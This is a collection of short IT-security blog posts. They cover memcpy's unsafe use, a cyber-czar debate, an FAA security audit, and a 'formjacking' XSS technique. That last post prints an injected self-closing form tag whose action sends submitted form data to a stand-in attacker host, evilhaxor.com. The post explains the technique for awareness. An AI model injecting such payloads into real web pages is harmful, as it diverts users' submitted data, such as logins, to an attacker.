Here’s an article stating that Microsoft has added memcopy to the list of naughty functions. This is really not a surprise in my opinion. For those of you who do not know why this is bad, memcopy copies data from one memory location to another. The problem is that it does not check the size of the receiving location to make sure there is enough room. Over the years, this has caused many vulnerabilities. As any good C/C++ developer knows, good memory management is crucial.
Eric IT Security buffer overflow, memcopy, software security
Just finished reading a blog over over at Digital Underground saying that Bruce Schneier says we don’t need a cyber czar. I couldn’t disagree with Mr. Schneier more! His criticism is:
"Really what I think is it shouldn’t be anybody. We do better without a top-down hierarchy. Our economic and political systems work best when there isn’t a dictator in charge, when there isn’t one organization in charge. My feeling is there shouldn’t be one organization in charge. Not only shouldn’t it be the NSA, it shouldn’t be anybody."
I believe in federalism, but I don’t think that will work with cyber security. The problem isn’t with a central authority like a cyber czar. The problem is the lack of mandate to make the government networks/applications secure. In my experience, people are more worried about security taking too long to implement and getting blamed for vulnerabilities. If Obama appointed a cyber czar and at the same time signed an executive order mandating that all government network/applications meet a central standard in a reasonable amount of time, our cyber readiness would be much better. That mandate couldn’t be ignored…
In the comments of the above post, one topic being discussed is that IT workers should be certified like engineers or architects. This is an interesting concept, but I’m skeptical of how much this will help. I know of many projects that were certified by a Professional Engineer (PE) that had design issues. PEs are still human…
Eric IT Security cyber czar, cyber security
Just read a cool post over at omg.wtf.bbq about a new attack called “formjacking”. Not sure about the attack name, but this is pretty neat. In FireFox 3 and IE7, self contained XHTML tags provide a way to exploit a XSS vulnerability and alter the action associated with a form tag. I’ve tested this out and it also works with Google Chrome, so the same goes for the other WebKit based browsers like Safari.
The gist is that if you can insert a self contained form tag, the browser will ignore the other form tags. Let’s say that you have the following code:
<form action="good.php" method="post">
<input type="text" name="test" id="test"></input>
<input type="Submit" value="Submit">
</form>
If you can insert a self enclosed form tag:
<form action="http://evilhaxor.com/pwned" method="post" />
<form action="good.php" method="post">
<input type="text" name="test" id="test"></input>
<input type="Submit" value="Submit">
</form>
Notice the forward slash at the end of the tag? The second form tag will be ignored and the post data will be sent to the inserted action.
Eric IT Security cross site scripting, software security, xss
The FAA has performed a security assessment of 70 of their web applications and found a large number of vulnerabilities. This doesn’t come as much of a surprise because most government agencies have not cracked down on software security. Besides the vulnerabilities, there are two things that bother me:
1. No Static Analysis – In the methodology section of the memo, it looks like KPMG only used penetration testing for this assessment. I’m not looking to start the typical static versus dynamic testing debate, but I was surprised that static analysis was not a component of this assessment. Automated penetration testing relies on the tool being used to find the vulnerabilities. Depending on the application, this type of testing could miss some critical vulnerabilities. Static analysis provides deeper analysis and can find vulnerabilities not detected by penetration testing tools. Not to mention, using static analysis early in the SDLC will decrease these vulnerabilities before they are released.
2. Separate Standards – In the memo, the writer mentions that the FAA uses “DOT Secure Web Application Standards”. The DoD has their standards, the DoT has their standards, NIST has standards, NSA has standards, etc. There really should be a standard that is applied to all agencies with a mandate from the President. Cybersecurity affects all agencies and we should all be on the same page.
It seems that Obama is taking a stand on cyber security and I hope they take this the right way.
Eric IT Security application security, faa, penetration testing, static analysis